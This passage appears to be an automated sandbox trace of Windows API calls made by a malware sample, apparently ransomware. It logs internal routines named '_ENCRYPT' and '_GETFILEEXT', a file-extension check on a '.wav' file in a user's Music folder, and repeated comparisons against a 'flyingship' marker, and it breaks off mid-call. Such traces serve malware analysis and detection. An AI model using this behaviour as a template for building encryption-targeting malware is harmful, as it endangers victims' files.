Size=0x10) returned 0x9bd8d0 [0182.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0182.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0182.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0182.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0182.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0182.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0182.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0182.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.458] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0182.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0182.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0182.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd8d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0182.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0182.459] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0182.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0182.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0182.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0182.459] CloseHandle (hObject=0x120) returned 1 [0182.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0182.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0182.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0182.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0182.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0182.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0182.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0182.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0182.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0182.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0182.460] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0182.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.461] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0182.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0182.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0182.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0182.461] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0182.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0182.461] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0182.461] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0182.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0182.461] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0182.461] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0182.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0182.461] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.461] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.461] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.461] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x223d2d0, ftCreationTime.dwHighDateTime=0x1d5da62, ftLastAccessTime.dwLowDateTime=0x2574c2b0, ftLastAccessTime.dwHighDateTime=0x1d5e60d, ftLastWriteTime.dwLowDateTime=0x2574c2b0, ftLastWriteTime.dwHighDateTime=0x1d5e60d, nFileSizeHigh=0x0, nFileSizeLow=0x122b9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="teBq0VdNSx.wav", cAlternateFileName="TEBQ0V~1.WAV")) returned 0x90add8 [0182.463] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0182.463] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.463] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x223d2d0, ftCreationTime.dwHighDateTime=0x1d5da62, ftLastAccessTime.dwLowDateTime=0x2574c2b0, ftLastAccessTime.dwHighDateTime=0x1d5e60d, ftLastWriteTime.dwLowDateTime=0x2574c2b0, ftLastWriteTime.dwHighDateTime=0x1d5e60d, nFileSizeHigh=0x0, nFileSizeLow=0x122b9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="teBq0VdNSx.wav", cAlternateFileName="TEBQ0V~1.WAV")) returned 0x90add8 [0182.463] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0182.464] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.466] CompareStringW (Locale=0x400, 